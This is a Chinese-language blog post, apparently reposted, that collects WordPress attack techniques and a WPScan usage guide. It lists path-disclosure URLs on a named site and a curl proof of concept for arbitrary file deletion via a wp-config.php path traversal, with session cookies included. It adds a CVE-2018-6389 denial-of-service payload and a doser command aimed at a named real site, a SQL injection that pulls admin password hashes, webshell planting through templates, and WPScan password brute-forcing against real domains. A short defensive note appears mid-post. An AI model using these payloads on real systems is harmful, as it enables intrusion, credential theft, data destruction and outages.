Wordpress漏洞,WPScan使用完整攻略

已于 2022-04-09 15:42:18 修改
阅读量2k 收藏
点赞数 1
分类专栏: # 通用漏洞 文章标签: 逻辑漏洞 heapdump 前端
于 2021-11-18 15:52:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50464560/article/details/121402829
版权

转载https://blog.csdn.net/m0_37438418/article/details/81109660

爆路径方法:

1.http://www.chouwazi.com/wp-admin/includes/admin.php  

2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php  

3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php  

4.http://www.chouwazi.com/wp-content/plugins/default/index.php  

5.http://www.chouwazi.com/wp-content/plugins/default/404.php  

6.http://www.chouwazi.com/wp-settings.php  

7.http://www.chouwazi.com/source/function/function_connect.php  

8.http://127.0.0.1/AllCMS/wordpress/wp-includes/registration-functions.php 

漏洞复现:

2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目前的wordpress 4.8.6 以及wordpress 4.9.6版本。可以删除网站上的任意文件,影响危害严重,甚至是致命的一个漏洞,如果被攻击者利用,后果将不堪设想。截止目前该漏洞还未有被修复,如果您在使用wordpress,请尽快将wp-includes文件夹下的post.php文件改名,等官方出wordpress漏洞补丁后,再改回并升级。

href='http://127.0.0.1/AllCMS/wordpress/wp-admin/post.php?post=4&amp;action=delete&amp;_wpnonce=12717cdebd'>永久删除</a>	</div>
  
  
<a class="screen-reader-shortcut" href="http://127.0.0.1/AllCMS/wordpress/wp-login.php?action=logout&#038;_wpnonce=05447e2e53"

cookie:

wordpress_740bcb2571e381529497b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7C5d84d42cfd206a46b5ff58555265887d796e9963772c58eed1795fd51a6a6c0a; wp-settings-time-1=1531966453; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_740bcb2571e381529497b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7Cd619b7954cb029edc28d923c5c45102c287110e124f012310aeaac1ee261887d; EJfX_2132_saltkey=w788x9t8; EJfX_2132_lastvisit=1531658111; hibext_instdsigdipv2=1; EJfX_2132_ulastactivity=8d850QpqXg15uPhEnqPt06yqLGsQxp3dko9XHY1WvSkslMa%2FWls0; Dl6Y_2132_saltkey=kj2hJJBQ; Dl6Y_2132_lastvisit=1531700649; Dl6Y_2132_ulastactivity=a1c1FdoVaiPz3buc%2FbOAzOuCRV9lu%2BXjPkbAZPdLCiN3sSGZE%2BAx; _ga=GA1.1.1487148300.1531791208; _gid=GA1.1.579984730.1531887964; security_level=0; wordpress_logged_in_740bcb2571e381529497b6b37b468e91=andy%7C1533129085%7CYQZJuAiCl0ev8J49HqsLCdHwMIuQLgFNoYtiMx7t2DB%7C8a009796bbdd71150a609fd9b05250f17b55307b8908c37e4fb57ec4871f6439

PoC:

C:\Users\49974>curl -v "http://127.0.0.1/AllCMS/wordpress/wp-admin/post.php?post=4" -H "cookie:wordpress_740bcb2571e381529497
b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7C5d84d42cfd206a46b5ff58555265887d796e9963772c58
eed1795fd51a6a6c0a; wp-settings-time-1=1531966453; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_740bcb2571e3815
29497b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7Cd619b7954cb029edc28d923c5c45102c287110e12
4f012310aeaac1ee261887d; EJfX_2132_saltkey=w788x9t8; EJfX_2132_lastvisit=1531658111; hibext_instdsigdipv2=1; EJfX_2132_ulasta
ctivity=8d850QpqXg15uPhEnqPt06yqLGsQxp3dko9XHY1WvSkslMa%2FWls0; Dl6Y_2132_saltkey=kj2hJJBQ; Dl6Y_2132_lastvisit=1531700649; D
l6Y_2132_ulastactivity=a1c1FdoVaiPz3buc%2FbOAzOuCRV9lu%2BXjPkbAZPdLCiN3sSGZE%2BAx; _ga=GA1.1.1487148300.1531791208; _gid=GA1.
1.579984730.1531887964; security_level=0; wordpress_logged_in_740bcb2571e381529497b6b37b468e91=andy%7C1533129085%7CYQZJuAiCl0
ev8J49HqsLCdHwMIuQLgFNoYtiMx7t2DB%7C8a009796bbdd71150a609fd9b05250f17b55307b8908c37e4fb57ec4871f6439" -d "action=editattachme
nt&_wpnonce=05447e2e53&thumb=../../../../wp-config.php"

这里应该是curl的一些配置不太熟悉,然后文件也没有删除

 

CVE-2018-6389

load-scripts.php用于加载JS和CSS文件的模块中存在此漏洞。 这些模块旨在为管理员设计减少页面加载时间,但实际上因为可以在登录之前允许任何人调用它已使WordPress核心易受DoS攻击。依靠已安装的插件和模块,load-scripts.php 文件可以通过传递 name 到 load 参数来选择性的调用必须的 JS 文件,这些 name 是以 , 隔开的,就像下面的链接:

poc:

http://127.0.0.1/AllCMS/wordpress/wp-admin/load-scripts.php?c=1&load=editor,common,user-profile,media-widgets,media-gallery

当网站加载时,load-scripts.php 会根据 URL 中的每个 name 去寻找对应的 JS 文件,并把其中的内容添加到一个单独的文件,然后发送回用户的 web 浏览器。
用户可以用预先定义好的列表 ( $wp_scripts ) 来发送请求,而这是 load [ ] 参数的一部分。如果请求的值存在,服务器会用从用户那里获取的补充值相关的预定义的路径来执行 I/O 读操作。
payload:

http://wordpress.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9

python doser.py -t 500 -g 'http://www.crs811.com'
 

防护建议

建议您使用精准访问控制和CC攻击自定义规则功能对您的WordPress网站业务进行防护。

  1. 通过精准访问控制功能,限制对load-scripts.php文件的传参数量。例如,配置以下规则限制对load-scripts.php文件的传参长度不大于50个字符。

    wp1

  2. 通过CC攻击防护自定义功能,限制同一个IP对load-scripts.php文件的请求频率。例如,配置以下规则限制对同一个IP对load-scripts.php文件的请求频率不超过5秒100次。

    CC攻击防护自定义规则

 

 

 

实战拿shell

在模板里加入一句话

 

换上大马

 

网站模版传shell

传入大马后,输入地址可以拿到shell

 

插件漏洞:

该SQL漏洞存在于wordpress的插件Ultimate Produce Catalogue 4.2.2版本,在Exploit Database可以搜到这个漏洞的信息:

基础环境

1. WordPress _v4.6源码,安装Ultimate Produce Catalogue 4.2.2版本插件。
2. 本机电脑搭建phpstudy作为WEB环境。

引起这个漏洞的原因是CatID的参数没有做转义处理导致sql注入,如下图,可执行sql语句。

http://127.0.0.1/AllCMS/wordpress/wp-admin/admin-ajax.php?action=get_upcp_subcategories
post:CatID=0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1

post:CatID=0 UNION SELECT @@version,database()

 

WPScan使用完整攻略

 wpscan http://192.168.211.137/AllCMS/wordpress/

wpscan -u http://192.168.211.137/AllCMS/wordpress/ --enumerate vt      扫描主题中存在的漏洞

wpscan -u http://192.168.211.137/AllCMS/wordpress/ --enumerate p       扫描WordPress站点中安装的插件

wpscan -u http://192.168.211.137/AllCMS/wordpress/ -e at -e ap -e u
枚举出所有的内容

爆破账号密码:

wpscan -u http://taoxiaozhong.com/ --wordlist '/root/Desktop/All/Dictory/Password/弱口令.txt'  --username 1457063@qq.com -t 10
枚举用户:

wpscan -u http://taoxiaozhong.com/  -enumerate u

 

 

 

参考:

WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)复现分析

wordpress4-9-6-任意文件删除

深入讲解(i春秋)

意外发现新的解析漏洞(P牛):https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html    

WordPress <4.7.1 远程代码执行漏洞CVE-2016-10033

WordPress REST API 内容注入漏洞

 

J0hnson666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WordPress v4.5.3 正式版
12-07
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对博客的应用,WordPress能让您省却对后台
wpscan-update.zip
03-29
wpscan更新包,用于解决kali初次使用wpscan时需要更新但时但是更新失败的问题 相关教程链接:https://blog.csdn.net/qq_43017750/article/details/105173019
【网安神器篇】——WPScan漏洞扫描工具
最新发布
xnxqwzy的博客
03-24 907
Wordpress作为三大建站模板之一,在全世界范围内有大量的用户,特别是学校网站非常爱用,这也导致白帽子都会去跟踪WordPress的安全漏洞Wordpress自诞生起也出现了很多漏洞Wordpress还可以使用插件主题。于是Wordpress本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞。通过插件,主题的漏洞去渗透Wordpress站点,于是WPScan应运而生,收集Wordpress的各种漏洞,形成一个Wordpress专用扫描器WPScan是Kali Linux默认自带。
wpscan:WPScan WordPress安全扫描程序。 专为安全专家和博客维护者测试其WordPress网站的安全性
02-05
WPScan WordPress安全扫描器 安装 先决条件 (可选,但强烈建议: ) Ruby> = 2.5-推荐:最新Ruby 2.5.0到2.5.3可能会在某些系统中导致“未定义符号:rmpd_util_str_to_d”错误,请参见 卷曲> = 7.72-推荐:最新 7.29有段错误 在某些情况下,<7.72可能会导致Stream error in the HTTP/2 framing layer中的Stream error in the HTTP/2 framing layer RubyGems-推荐:最新 根据您的操作系统,Nokogiri可能需要通过软件包管理器来安装软件
利用 PHP7 的 OPcache 执行 PHP 代码
swordheart的博客
04-25 670
from:http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ 在 PHP 7.0 发布之初,就有不少 PHP 开发人员对其性能提升方面非常关注。在引入 OPcache 后,PHP的性能的确有了很大的提升,之后,很多开发人员都开始采用 OPcache 作为 PHP 应用的加速器。OPcache 带来良好性能的同时也带来了新的安全隐患,下面的内容是 GoSecure 博客发表的一篇针对 PHP 7.0 的 O
墨者靶场 WordPress插件漏洞分析溯源
永远是少年
12-30 1333
今天继续给大家介绍CTF刷题,本文主要内容墨者靶场 WordPress插件漏洞分析溯源。 一、题目简介 二、解题实战
Wordpress漏洞
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
Wordpress漏洞复现
weixin_52194536的博客
09-10 8326
cms漏洞
wordpress4.9漏洞
小小猪的博客
12-01 7968
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
如何挖掘Wordpress网站的漏洞
fly_enum的博客
06-10 985
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。
Wordpress 漏洞利用与后渗透
Y525698136的博客
01-11 1127
渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章。特别 注意的是一定先去找对应版本漏洞,不要自己手工测基本行不通的。
wp-vulnerability-check:通过API来检查WPScan漏洞数据库的命令行,以识别已安装的WordPress插件的安全性问题
01-30
WordPress漏洞检查(wp-vulnerability-check) WordPress漏洞检查(wp-vulnerability-check)是一个控制台应用程序,可通过API检查WPScan漏洞数据库,以识别已安装的WordPress插件的安全性问题。 如果您将WordPress...
Wordpresscan:用Python重写WPScan +一些WPSeku想法
02-05
Wordpresscan 一个简单的基于WPScan(Ruby版本)以python编写的Wordpress扫描程序,某些功能受WPSeku的启发。免责声明The authors of this github are not responsible for misuse or for any damage that you may ...
-Wpscan
03-20
一个简单的基于WPScan(Ruby版本)的Python编写的Wordpress扫描器,某些功能受WPSeku的启发。 免责声明 The authors of this github are not responsible for misuse or for any damage that you may cause! You ...
针对Resin服务的攻击整理
热门推荐
weixin_50464560的博客
09-29 4万+
转载http://blkstone.github.io/2017/10/30/resin-attack-vectors/#:~:text=Resin%20for%20Windows%E5%AE%9E%E7%8E%B0%E4%B8%8A%E5%AD%98%E5%9C%A8%E5%A4%9A%E4%B8%AA%E6%BC%8F%E6%B4%9E%EF%BC%8C%E8%BF%9C%E7%A8%8B%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E8%83%BD%E5%88%A9%E7%
Discuz X 3.4 系列漏洞梳理
weixin_50464560的博客
04-05 2万+
分析了目前已经公开的Dz3.4系列漏洞,作为学习和记录。 Discuz!X ≤3.4 任意文件删除漏洞 1、简述 漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。 漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复 2、复现环境 因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。 git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be 通过安装向导安装完.
edusrc0day挖掘技巧
weixin_50464560的博客
05-05 1万+
网瑞达web资源管理系统0dayps: 作为在edusrc的小白,经常看见大师傅们的刷屏,我也很向往能像大师们一样有一次刷屏的机会,于是有了这一次的渗透之旅。思路:要想刷屏上分,就得找系统来挖掘,对于不会审计的我来说只有做一些黑盒测试(会审计大佬可以忽略这一点)首先我们利用fofa找一些与edu有关的系统​ 语法:“系统” && org=“China Education and Research Network Center”其中可以在前面加一些:阅卷系统、评分系统、直播系统、录播系统。(我
(CVE-2021-28164/CVE-2021-34429)Eclipse Jetty WEB-INF敏感信息泄露漏洞分析
weixin_50464560的博客
10-04 7931
本文主要从Jetty的两个WEB-INF信息泄露漏洞CVE-2021-28164和CVE-2021-34429,来分析如何通过编码和相对路径来绕过对敏感信息的校验,以及Jetty中对URL的PATH的解析方式和存在的问题。 漏洞信息 Jetty作为Eclipse基金会的一部分,是一个纯粹的基于Java的网页服务器和Java Servlet容器,其支持最新的Java Servlet API,同时支持WebSocket,SPDY,HTTP/2协议。 在Jetty9.4.37版本...
Ueditor的XML文件上传导致存储型XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 6770
UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版v1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类型改为uploadfile,并修改文件后...
wordpress漏洞利用工具
09-06
- *3* [Wordpress漏洞利用&WPscan使用](https://blog.csdn.net/q20010619/article/details/121389238)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

J0hnson666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值